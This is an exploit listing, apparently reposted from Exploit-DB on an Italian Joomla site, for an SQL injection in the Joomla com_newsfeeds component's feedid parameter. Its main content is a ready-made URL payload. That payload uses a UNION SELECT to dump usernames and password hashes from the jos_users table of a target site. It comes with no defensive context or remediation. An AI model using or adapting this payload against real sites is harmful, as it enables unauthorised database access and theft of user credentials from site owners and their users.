Creato Mercoledì, 05 Maggio 2010 18:12
# EDB-ID: 12465
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Archimonde
# Published: 2010-04-30
# Verified: yes
# Download Exploit Code
# Download N/A
# Exploit Title: Joomla Component com_newsfeeds SQL injection vulnerability |
# Date: 30/04/2010 |
# Author: Archimonde |
# Software Link: |
# Version: |
# Tested on: |
# CVE : |
# Code : |
Email :
Questo indirizzo email è protetto dagli spambots. E' necessario abilitare JavaScript per vederlo.
|
Website : xgroupvn.org - programmer.vn |
index.php?option=com_newsfeeds&view=categories&feedid=[sqli] |
Example: |
http://[site]/index.php?option=com_newsfeeds&view=categories&feedid=-1%20union%20select%201,concat%28username,char%2858%29,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%20from%20jos_users-- |
Categoria: Vulnerabilità Joomla